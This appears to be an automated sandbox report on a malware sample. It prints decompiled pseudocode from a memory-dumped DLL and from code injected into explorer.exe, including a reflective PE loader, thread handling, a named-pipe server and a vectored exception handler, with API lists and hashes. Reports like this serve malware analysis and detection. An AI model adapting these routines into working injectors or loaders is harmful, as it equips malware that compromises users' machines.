						E10004A0C( *((intOrPtr*)( *((intOrPtr*)(_t131 + 0x110)))), _t21, _t354, _t325, _t242, _t242);
						_t258 =  *0x1001e688; // 0x87804a0
						__eflags =  *((intOrPtr*)(_t258 + 0x101c)) - 3;
						if( *((intOrPtr*)(_t258 + 0x101c)) == 3) {
							L19:
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v572 = _t325;
							_v576 =  *((intOrPtr*)(_t258 + 0x214));
							_t135 =  *0x1001e680; // 0x0
							_t136 =  *(_t135 + 8);
							__eflags = _t136;
							if(_t136 != 0) {
								 *_t136(_t242, _t242, 1,  &_v568,  &_v564);
							}
							_v620 = _t242;
							E1000E2D1(_t354,  &_v576);
							_pop(_t258);
							_t140 =  *0x1001e6b4; // 0x87ffa20
							_t141 =  *((intOrPtr*)(_t140 + 0x10))(_t242, _t242,  &_v620);
							__eflags = _t141;
							if(_t141 == 0) {
								E1000E2D1(_t354,  &_v588);
								_t230 =  *0x1001e6b4; // 0x87ffa20
								_pop(_t258);
								 *((intOrPtr*)(_t230 + 0xc))(_v632);
							}
							__eflags =  *0x1001e73c;
							if( *0x1001e73c <= 0) {
								goto L37;
							} else {
								_t163 =  *0x1001e680; // 0x0
								__eflags =  *((intOrPtr*)(_t163 + 8)) - _t242;
								if( *((intOrPtr*)(_t163 + 8)) != _t242) {
									_t226 =  *(_t163 + 0xc);
									__eflags = _t226;
									if(_t226 != 0) {
										 *_t226(_v580);
									}
								}
								_t164 =  *0x1001e688; // 0x87804a0
								_t258 =  *((intOrPtr*)(_t164 + 0x214));
								__eflags = _t258 - 3;
								if(_t258 == 3) {
									goto L37;
								} else {
									__eflags =  *((intOrPtr*)(_t164 + 4)) - 6;
									if( *((intOrPtr*)(_t164 + 4)) >= 6) {
										__eflags =  *((intOrPtr*)(_t164 + 0x101c)) - 3;
										if( *((intOrPtr*)(_t164 + 0x101c)) != 3) {
											goto L37;
										}
										E100049A6();
										asm("stosd");
										asm("stosd");
										asm("stosd");
										asm("stosd");
										_t168 =  *0x1001e684; // 0x87ff878
										 *((intOrPtr*)(_t168 + 0xd8))( &_v608);
										_t266 = _v602;
										_t244 = 0x3c;
										_t171 = _t266 + 0x00000002 & 0x0000ffff;
										_v596 = _t171;
										_v620 = _t171 / _t244 + _v604 & 0x0000ffff;
										_t176 = _t266 + 0x0000000e & 0x0000ffff;
										_v624 = _t176;
										_v628 = _t176 / _t244 + _v604 & 0x0000ffff;
										_t180 = E100085EA(0x1000);
										_v632 = _t180;
										_pop(_t267);
										__eflags = _t180;
										if(_t180 != 0) {
											_t181 = E1000109A(_t267, 0x148);
											_t302 =  *0x1001e688; // 0x87804a0
											_v636 = _t181;
											_push(_t302 + 0x648);
											_push(0xa);
											_push(7);
											_t269 = 2;
											E10009013(_t269,  &_v572);
											_t270 =  *0x1001e688; // 0x87804a0
											_t330 = E100060C5( &_v572, _t270 + 0x228, 1,  *((intOrPtr*)(_t270 + 0xa0)));
											_v616 = _t330;
											__eflags = _t330;
											if(_t330 != 0) {
												_push(_v624 % _t244 & 0x0000ffff);
												_push(_v628 & 0x0000ffff);
												_push(_v596 % _t244 & 0x0000ffff);
												_push(_v620 & 0x0000ffff);
												_push(_t330);
												_push( &_v572);
												_t195 =  *0x1001e688; // 0x87804a0
												__eflags = _t195 + 0x1020;
												E10009626(_v632, 0x1000, _v636, _t195 + 0x1020);
												E100085BB( &_v636);
												E1000A8F7(_v632, 0, 0xbb8, 1);
												E10008600( &_v616, 0xfffffffe);
											}
											E10008600( &_v632, 0xfffffffe);
										}
										goto L42;
									}
									__eflags = _t258 - 2;
									if(_t258 != 2) {
										goto L37;
									}
									E100049A6();
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t206 =  *0x1001e684; // 0x87ff878
									 *((intOrPtr*)(_t206 + 0xd8))( &_v608);
									_t210 = _v602 + 0x00000002 & 0x0000ffff;
									_v628 = _t210;
									_t245 = 0x3c;
									_v632 = _t210 / _t245 + _v604 & 0x0000ffff;
									_t322 = E100085EA(0x1000);
									_v624 = _t322;
									_pop(_t276);
									__eflags = _t322;
									if(_t322 != 0) {
										_t215 = E100095C7(_t276, 0x32d);
										_t278 =  *0x1001e688; // 0x87804a0
										_push(_t278 + 0x228);
										_push(_v628 % _t245 & 0x0000ffff);
										_v636 = _t215;
										E10009626(_t322, 0x1000, _t215, _v632 & 0x0000ffff);
										E100085BB( &_v636);
										E1000A8F7(_t322, 0, 0xbb8, 1);
										E10008600( &_v624, 0xfffffffe);
									}
									goto L42;
								}
							}
						} else {
							_t233 =  *((intOrPtr*)(_t258 + 0x214));
							__eflags = _t233 - 3;
							if(_t233 == 3) {
								goto L19;
							}
							__eflags =  *((intOrPtr*)(_t258 + 4)) - 6;
							if( *((intOrPtr*)(_t258 + 4)) >= 6) {
								L37:
								_t142 = E100095C7(_t258, 0x610);
								_push(_t242);
								_push(_t142);
								_v616 = _t142;
								_t143 =  *0x1001e688; // 0x87804a0
								_t326 = E100092CB(_t143 + 0x228);
								_v612 = _t326;
								__eflags = _t326;
								if(_t326 != 0) {
									_t158 = E1000B24F(_t326);
									__eflags = _t158;
									if(_t158 != 0) {
										_t161 =  *0x1001e684; // 0x87ff878
										 *((intOrPtr*)(_t161 + 0x10c))(_t326);
									}
									E10008600( &_v612, 0xfffffffe);
								}
								E100085BB( &_v616);
								_t148 =  *0x1001e688; // 0x87804a0
								lstrcpynW(_t148 + 0x438,  *0x1001e740, 0x20a);
								_t151 =  *0x1001e688; // 0x87804a0
								_t152 = _t151 + 0x228;
								__eflags = _t152;
								lstrcpynW(_t152,  *0x1001e738, 0x20a);
								_t328 =  *0x1001e688; // 0x87804a0
								_t115 = _t328 + 0x228; // 0x87806c8
								 *((intOrPtr*)(_t328 + 0x434)) = E10008FA4(_t115, __eflags);
								E10008600(0x1001e740, 0xfffffffe);
								E10008600(0x1001e738, 0xfffffffe);
								L42:
								_t157 = 0;
								__eflags = 0;
								L43:
								return _t157;
							}
							__eflags = _t233 - 2;
							if(_t233 != 2) {
								goto L37;
							}
							goto L19;
						}
					}
					L9:
					_t157 = _t120 | 0xffffffff;
					goto L43;
				}
				_t246 = E100095AD(0x6e2);
				_v616 = _t246;
				_t323 = E100095AD(0x9f5);
				_v612 = _t323;
				if(_t246 == 0 || _t323 == 0) {
					L7:
					_t242 = 0;
					goto L8;
				} else {
					if(GetModuleHandleA(_t246) != 0 || GetModuleHandleA(_t323) != 0) {
						_v620 = 1;
					}
					E100085A8( &_v616);
					_t120 = E100085A8( &_v612);
					if(_v620 != 0) {
						goto L9;
					}
					goto L7;
				}
			}

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 10004DC2
GetModuleHandleA.KERNEL32(00000000), ref: 10004DC9
lstrcpynW.KERNEL32(08780068,0000020A,?,?,?,?,?,?,?,?,?,00000000), ref: 10005257
lstrcpynW.KERNEL32(08780278,0000020A,?,?,?,?,?,?,?,?,?,00000000), ref: 1000526B

Memory Dump Source

Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleModulelstrcpyn
String ID:
API String ID: 3430401031-0
Opcode ID: 286693d3f176852be07bbcfb61a8a188315f9be8f2c45d0ace0761040679fd0f
Instruction ID: af7c25fddbaaac8c810623370fa574110a5ffa4de8c8a0639458766f2d690bf0
Opcode Fuzzy Hash: 286693d3f176852be07bbcfb61a8a188315f9be8f2c45d0ace0761040679fd0f
Instruction Fuzzy Hash: 02E1DBB1508341AFF300CF68CC85EABB3E9EB98394F414A2AF584C7295DB71ED448B52

Uniqueness

Uniqueness Score: -1.00%

Function 10012AF7, Relevance: 6.2, APIs: 4, Instructions: 219
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E10012AF7(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				signed int* _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				intOrPtr* _v40;
				signed short* _v44;
				intOrPtr _v48;
				unsigned int _v52;
				intOrPtr _v56;
				_Unknown_base(*)()* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				unsigned int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _t149;
				void* _t189;
				signed int _t194;
				signed int _t196;
				intOrPtr _t236;

				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v24 = _v72;
				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
				_v56 = _t236;
				if(_t236 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
						L35:
						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v68;
						}
						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
						return _v68(_a4, 1, _a8);
					}
					_v84 = 0x80000000;
					_t149 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v20 =  *_v16 + _a4;
							}
							_v64 = _v64 & 0x00000000;
							while( *_v20 != 0) {
								if(( *_v20 & _v84) == 0) {
									_v88 =  *_v20 + _a4;
									_v60 = GetProcAddress(_v36, _v88 + 2);
								} else {
									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v20 = _v60;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
								}
								_v20 =  &(_v20[1]);
								_v64 = _v64 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t189 = 0xfffffffd;
							return _t189;
						}
					}
					goto L35;
				}
				_t194 = 8;
				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
				_t196 = 8;
				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
				while(0 != 0) {
				}
				while(_v48 > 0) {
					_v28 = _v44[2];
					_v48 = _v48 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v44[4]);
					_v80 = _a4 +  *_v44;
					_v52 = _v28;
					while(1) {
						_v76 = _v52;
						_v52 = _v52 - 1;
						if(_v76 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v40 = (_v12 & 0x0000ffff) + _v80;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v40 =  *_v40 + _v56;
							}
						} else {
							 *_v40 =  *_v40 + _v56;
						}
						_v32 =  &(_v32[1]);
					}
					_v44 = _v32;
				}
				goto L13;
			}

APIs

GetModuleHandleA.KERNEL32(?), ref: 10012C57
LoadLibraryA.KERNEL32(?), ref: 10012C70
GetProcAddress.KERNEL32(00000000,890CC483), ref: 10012CCC
GetProcAddress.KERNEL32(00000000,?), ref: 10012CEB

Memory Dump Source

Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID:
API String ID: 384173800-0
Opcode ID: 1dd9d1ec13e0e0c9236e88ac1c4924bd5e04187c8fc8866083520a7049e97579
Instruction ID: 40dbc58933749a0a0cd74d6661849015ce43e91b4c911e91057927375977fa56
Opcode Fuzzy Hash: 1dd9d1ec13e0e0c9236e88ac1c4924bd5e04187c8fc8866083520a7049e97579
Instruction Fuzzy Hash: F5A179B5A00219DFCB54CFA8C881AADBBF1FF08354F108569E915AB361D734EA91CB64

Uniqueness

Uniqueness Score: -1.00%

Function 10001C68, Relevance: 6.1, APIs: 4, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E10001C68(signed int __ecx, void* __eflags, void* __fp0) {
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t13;
				intOrPtr _t15;
				signed int _t16;
				intOrPtr _t17;
				signed int _t18;
				char _t20;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				signed int _t61;
				signed int _t64;
				void* _t71;

				_t71 = __fp0;
				_t61 = __ecx;
				_t41 =  *0x1001e6dc; // 0x0
				_t13 = E1000A4A5(_t41, 0);
				while(_t13 < 0) {
					E100097F2( &_v28);
					_t43 =  *0x1001e6e0; // 0x0
					_t15 =  *0x1001e6e4; // 0x0
					_t41 = _t43 + 0xe10;
					asm("adc eax, ebx");
					__eflags = _t15 - _v24;
					if(__eflags > 0) {
						L9:
						_t16 = 0xfffffffe;
						L13:
						return _t16;
					}
					if(__eflags < 0) {
						L4:
						_t17 =  *0x1001e684; // 0x87ff878
						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x1001e6d0, 0);
						__eflags = _t18;
						if(_t18 == 0) {
							break;
						}
						_t35 =  *0x1001e684; // 0x87ff878
						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
						_t41 =  *0x1001e6dc; // 0x0
						__eflags = 0;
						_t13 = E1000A4A5(_t41, 0);
						continue;
					}
					__eflags = _t41 - _v28;
					if(_t41 >= _v28) {
						goto L9;
					}
					goto L4;
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t20 =  *0x1001e6e8; // 0x0
				_v28 = _t20;
				_t22 = E1000A68F(_t41, _t61,  &_v16);
				_v20 = _t22;
				if(_t22 != 0) {
					_t23 = GetCurrentProcess();
					_t24 = GetCurrentThread();
					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x1001e6d0, 0, 0, 2);
					E100097F2(0x1001e6e0);
					_t64 = E10001A1B( &_v28, E10001226, _t71);
					__eflags = _t64;
					if(_t64 >= 0) {
						_push(0);
						_push( *0x1001e760);
						_t51 = 0x27;
						E10009EEC(_t51);
					}
				} else {
					_t64 = _t61 | 0xffffffff;
				}
				_t29 =  *0x1001e684; // 0x87ff878
				 *((intOrPtr*)(_t29 + 0x30))( *0x1001e6d0);
				_t48 =  *0x1001e6dc; // 0x0
				 *0x1001e6d0 = 0;
				E1000A4C1(_t48);
				E10008600( &_v24, 0);
				_t16 = _t64;
				goto L13;
			}

Memory Dump Source

Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1b745fdbffcc919f21494d6dc9c505ee260cdefba6441b02a46ce43fb73c69e
Instruction ID: d906aae5790399c38ac9c36321e5d7763f5971439be1128eebad97b72ddd2630
Opcode Fuzzy Hash: d1b745fdbffcc919f21494d6dc9c505ee260cdefba6441b02a46ce43fb73c69e
Instruction Fuzzy Hash: E131B4366082A4AFF344DFA4DCC5C6E77A9FB983E0B904A2AF541D71A5DE30ED048752

Uniqueness

Uniqueness Score: -1.00%

Function 10001B2D, Relevance: 6.1, APIs: 4, Instructions: 97
threadCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E10001B2D(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				void* _t12;
				intOrPtr _t14;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				char _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr _t40;
				void* _t41;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t51;
				void* _t61;
				void* _t71;

				_t71 = __fp0;
				_t38 =  *0x1001e6f4; // 0x0
				_t12 = E1000A4A5(_t38, 0);
				while(_t12 < 0) {
					E100097F2( &_v28);
					_t40 =  *0x1001e700; // 0x0
					_t14 =  *0x1001e704; // 0x0
					_t41 = _t40 + 0x3840;
					asm("adc eax, ebx");
					__eflags = _t14 - _v24;
					if(__eflags > 0) {
						L13:
						_t15 = 0;
					} else {
						if(__eflags < 0) {
							L4:
							_t16 =  *0x1001e684; // 0x87ff878
							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x1001e6ec, 0);
							__eflags = _t17;
							if(_t17 == 0) {
								break;
							} else {
								_t33 =  *0x1001e684; // 0x87ff878
								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
								_t51 =  *0x1001e6f4; // 0x0
								__eflags = 0;
								_t12 = E1000A4A5(_t51, 0);
								continue;
							}
						} else {
							__eflags = _t41 - _v28;
							if(_t41 >= _v28) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
					L12:
					return _t15;
				}
				E100097F2(0x1001e700);
				_t19 = GetCurrentProcess();
				_t20 = GetCurrentThread();
				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x1001e6ec, 0, 0, 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 =  *0x1001e6e8; // 0x0
				_v28 = _t24;
				_t61 = E10001A1B( &_v28, E1000131E, _t71);
				if(_t61 >= 0) {
					_push(0);
					_push( *0x1001e760);
					_t48 = 0x27;
					E10009EEC(_t48);
				}
				if(_v24 != 0) {
					E10006876( &_v24);
				}
				_t26 =  *0x1001e684; // 0x87ff878
				 *((intOrPtr*)(_t26 + 0x30))( *0x1001e6ec);
				_t28 =  *0x1001e758; // 0x0
				 *0x1001e6ec = 0;
				_t29 =  !=  ? 1 : _t28;
				_t46 =  *0x1001e6f4; // 0x0
				 *0x1001e758 =  !=  ? 1 : _t28;
				E1000A4C1(_t46);
				_t15 = _t61;
				goto L12;
			}

APIs

GetCurrentProcess.KERNEL32(1001E6EC,00000000,00000000,00000002), ref: 10001BCC
GetCurrentThread.KERNEL32 ref: 10001BCF
GetCurrentProcess.KERNEL32(00000000), ref: 10001BD6
DuplicateHandle.KERNEL32(00000000), ref: 10001BD9

Memory Dump Source

Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: Current$Process$DuplicateHandleThread
String ID:
API String ID: 3566409357-0
Opcode ID: 982b2c05f984020617e5bef145b75b34b208ca43f29a0efeb761dedb6e1fabef
Instruction ID: d1363189eadf394b0d6d3c5faf128b237252a217eef9a43260953257b15cddd2
Opcode Fuzzy Hash: 982b2c05f984020617e5bef145b75b34b208ca43f29a0efeb761dedb6e1fabef
Instruction Fuzzy Hash: 9C31AD796083A19FF704DF64CCD8D6E77A9EB983D0B408928F601872A6DB30EC44CB52

Uniqueness

Uniqueness Score: -1.00%

Function 10001A1B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108
stringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E10001A1B(intOrPtr __ecx, intOrPtr __edx, void* __fp0) {
				CHAR* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				CHAR* _v20;
				char _v36;
				signed short _t22;
				CHAR* _t23;
				CHAR* _t24;
				CHAR* _t32;
				intOrPtr _t37;
				CHAR* _t38;
				CHAR* _t39;
				intOrPtr _t40;
				intOrPtr _t54;
				char* _t57;
				signed int _t60;
				signed int _t61;
				signed int _t64;
				CHAR* _t66;
				void* _t74;

				_t74 = __fp0;
				_t40 = __ecx;
				_t37 = __edx;
				_v12 = __ecx;
				_t57 =  *0x1001e6f0; // 0x0
				_push(_t60);
				_t61 = _t60 | 0xffffffff;
				_v16 = __edx;
				_t66 = _t61;
				if( *_t57 != 0) {
					L6:
					_t22 =  *0x1001e6fc; // 0x0
					_t72 = _t22;
					if(_t22 == 0) {
						goto L9;
					} else {
						_t24 = E1000160D(_t37, _t57, _t72, _t22 & 0x0000ffff, _t40);
						_t66 = _t24;
						if(_t66 < 0) {
							goto L9;
						} else {
						}
					}
				} else {
					_push(0x2d);
					_t39 = E10009E8B();
					_v20 = _t39;
					_t32 = E10009E4C(0x2e);
					_v8 = _t32;
					if(_t39 != 0 && _t32 != _t61) {
						_t54 =  *0x1001e6f0; // 0x0
						E100096B0(_t54, _t39, 0x100);
						 *0x1001e6fc = _v8;
					}
					E10008600( &_v20, _t61);
					_t57 =  *0x1001e6f0; // 0x0
					if( *_t57 == 0) {
						L9:
						_t38 = 0;
						_v8 = 0;
						_t23 = E10001778( &_v8, _t74);
						_v20 = _t23;
						__eflags = _t23;
						if(_t23 != 0) {
							__eflags = _v8;
							if(_v8 > 0) {
								_t13 =  &(_t23[4]); // 0x4
								_t64 = _t13;
								while(1) {
									__eflags =  *_t64;
									if(__eflags != 0) {
										__imp__#12(0x10);
										lstrcpynA( &_v36, _t23,  *_t64);
										_t23 = E1000160D(_v16,  &_v36, __eflags,  *(_t64 + 4) & 0x0000ffff, _v12);
										_t66 = _t23;
									}
									__eflags = _t66;
									if(_t66 >= 0) {
										break;
									}
									_t38 = _t38 + 1;
									_t64 = _t64 + 0x20;
									__eflags = _t38 - _v8;
									if(_t38 < _v8) {
										continue;
									}
									break;
								}
								_t61 = _t64 | 0xffffffff;
								__eflags = _t61;
							}
							E10008600( &_v20, _v8);
						}
						__eflags = _t66;
						_t62 =  >=  ? _t66 : _t61;
						_t24 =  >=  ? _t66 : _t61;
					} else {
						_t37 = _v16;
						_t40 = _v12;
						goto L6;
					}
				}
				return _t24;
			}

APIs

inet_ntoa.WS2_32(00000004), ref: 10001ADB
lstrcpynA.KERNEL32(?,00000000), ref: 10001AE6

Part of subcall function 100096B0: memset.MSVCRT ref: 100096D9

Strings

@}s, xrefs: 10001ADB

Memory Dump Source

Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: inet_ntoalstrcpynmemset
String ID: @}s
API String ID: 129148211-1738643329
Opcode ID: 11795a285bf89cebb4f9c0d4940ad6dddf9e271b37e48aaca9a923e92fe3d613
Instruction ID: bc20ad2b03a49fadc3bce8d2214928905f70a7fbf5e9e1e62064ea73bd786d80
Opcode Fuzzy Hash: 11795a285bf89cebb4f9c0d4940ad6dddf9e271b37e48aaca9a923e92fe3d613
Instruction Fuzzy Hash: CA31C936E04366ABFB01CFE4D881ADE77F5EB48390F21465AE510A72D5EB319E40CB94

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exe PID: 5616 Parent PID: 5756 explorer.exeCOMMON

Executed Functions

Function 036031C2, Relevance: 1.6, APIs: 1, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E036031C2(void* __eflags) {
				CHAR* _v8;
				void* _v20;
				signed int _t10;
				intOrPtr _t11;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t22;
				intOrPtr _t28;
				void* _t33;
				CHAR* _t42;

				_t28 =  *0x361e688; // 0x33f0000
				_t10 = E0360C29D( *((intOrPtr*)(_t28 + 0xac)), __eflags);
				_t42 = _t10;
				_v8 = _t42;
				if(_t42 != 0) {
					_t11 = E036085EA(0x80000); // executed
					 *0x361e724 = _t11;
					__eflags = _t11;
					if(_t11 != 0) {
						__eflags = E0360BE81( &_v20);
						_t33 =  <  ? 0 : _v20;
						__eflags = 0 - _t33;
						_v20 = _t33;
						asm("sbb eax, eax");
						_t16 = CreateNamedPipeA(_t42, 0x80003, 6, 0xff, 0x80000, 0x80000, 0, 0 &  &_v20);
						 *0x361e674 = _t16;
						__eflags = _t16 - 0xffffffff;
						if(_t16 != 0xffffffff) {
							E0360BC60( &_v20, 0); // executed
							_t18 = E036098D4(E03603296, 0, __eflags, 0, 0); // executed
							__eflags = _t18;
							if(_t18 != 0) {
								L9:
								E03608600( &_v8, 0xffffffff);
								return 0;
							}
							_t22 =  *0x361e684; // 0x530f6c8
							 *((intOrPtr*)(_t22 + 0x30))( *0x361e674);
							_push(0xfffffffd);
							L8:
							_pop(0);
							goto L9;
						}
						 *0x361e674 = 0;
						_push(0xfffffffe);
						goto L8;
					}
					_push(0xfffffff5);
					goto L8;
				}
				return _t10 | 0xffffffff;
			}

0x036031c8
0x036031d8
0x036031dd
0x036031df
0x036031e4
0x036031f5
0x036031fa
0x03603200
0x03603202
0x03603215
0x03603217
0x0360321c
0x0360321e
0x03603224
0x0360323e
0x03603244
0x03603249
0x0360324c
0x03603258
0x03603266
0x0360326d
0x0360326f
0x03603282
0x03603288
0x00000000
0x03603291
0x03603271
0x0360327c
0x0360327f
0x03603281
0x03603281
0x00000000
0x03603281
0x0360324e
0x03603254
0x00000000
0x03603254
0x03603204
0x00000000
0x03603204
0x00000000

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0245a9b27479b5fa69b150c7ef3cb326fcf0d6f4cdf4afcd7e00c2931f0c97f
Instruction ID: 4d9df8c896b71bbb4325747987a31f00b87b0ce33fef9b1792dece7869bd492c
Opcode Fuzzy Hash: d0245a9b27479b5fa69b150c7ef3cb326fcf0d6f4cdf4afcd7e00c2931f0c97f
Instruction Fuzzy Hash: D2210B35A043156AD71CEBB9DC46E6B37ACEB45270B34072EF425D72D8EA31D4018795

Uniqueness

Uniqueness Score: -1.00%

Function 03605A49, Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03605A49(void* __eflags) {
				intOrPtr _t2;
				void* _t6;
				void* _t7;

				_t2 =  *0x361e684; // 0x530f6c8
				 *((intOrPtr*)(_t2 + 0x108))(1, E036059EE);
				E03605619(_t6, _t7); // executed
				return 0;
			}

0x03605a49
0x03605a55
0x03605a5b
0x03605a62

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,036059EE,03605CD0), ref: 03605A55

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: 232dcb991cea7a50207f26e4f6e17b19fcf66033f0cc1b3cde8ce0133a66def3
Instruction ID: b7ad312b9c94c01920eed697b96bea3ae755d78ffaa1647c6757c04a18eb49e4
Opcode Fuzzy Hash: 232dcb991cea7a50207f26e4f6e17b19fcf66033f0cc1b3cde8ce0133a66def3
Instruction Fuzzy Hash: 26B092303682009FC784A760990BE9A32906B12701F0900A47286CA0AADAD188A15A45

Uniqueness

Uniqueness Score: -1.00%

Function 03604A0C, Relevance: 9.3, APIs: 6, Instructions: 285
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E03604A0C(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				char _v516;
				void _v1044;
				char _v1076;
				signed int _v1080;
				signed int _v1096;
				WCHAR* _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				char _v1144;
				char _v1148;
				void* __esi;
				intOrPtr _t66;
				intOrPtr _t73;
				signed int _t75;
				intOrPtr _t76;
				signed int _t80;
				signed int _t81;
				WCHAR* _t87;
				void* _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				WCHAR* _t96;
				intOrPtr _t106;
				intOrPtr _t107;
				void* _t108;
				intOrPtr _t109;
				signed char _t116;
				WCHAR* _t118;
				void* _t122;
				signed int _t123;
				intOrPtr _t125;
				void* _t128;
				void* _t129;
				WCHAR* _t130;
				void* _t134;
				void* _t141;
				void* _t143;
				WCHAR* _t145;
				signed int _t153;
				void* _t154;
				void* _t178;
				signed int _t180;
				void* _t181;
				void* _t183;
				void* _t187;
				signed int _t188;
				WCHAR* _t190;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t196;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;
				intOrPtr* _t203;
				void* _t208;

				_t208 = __fp0;
				_push(_t191);
				_t128 = __edx;
				_t187 = __ecx;
				_t192 = _t191 | 0xffffffff;
				memset( &_v1044, 0, 0x20c);
				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
				_v1108 = 1;
				if(_t187 != 0) {
					_t123 =  *0x361e688; // 0x33f0000
					_t125 =  *0x361e68c; // 0x530f890
					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
				}
				if(E0360BB73(_t187) != 0) {
					L4:
					_t134 = _t128; // executed
					_t66 = E0360B78E(_t134,  &_v516); // executed
					_push(_t134);
					_v1104 = _t66;
					E0360B663(_t66,  &_v1076, _t206, _t208);
					_t129 = E036049C8( &_v1076,  &_v1076, _t206);
					_t141 = E0360D40B( &_v1076, E0360C384( &_v1076), 0);
					E0360B870(_t141,  &_v1100, _t208);
					_t175 =  &_v1076;
					_t73 = E03602C8F(_t187,  &_v1076, _t206, _t208); // executed
					_v1112 = _t73;
					_t143 = _t141;
					if(_t73 != 0) {
						_push(0);
						_push(_t129);
						_push("\\");
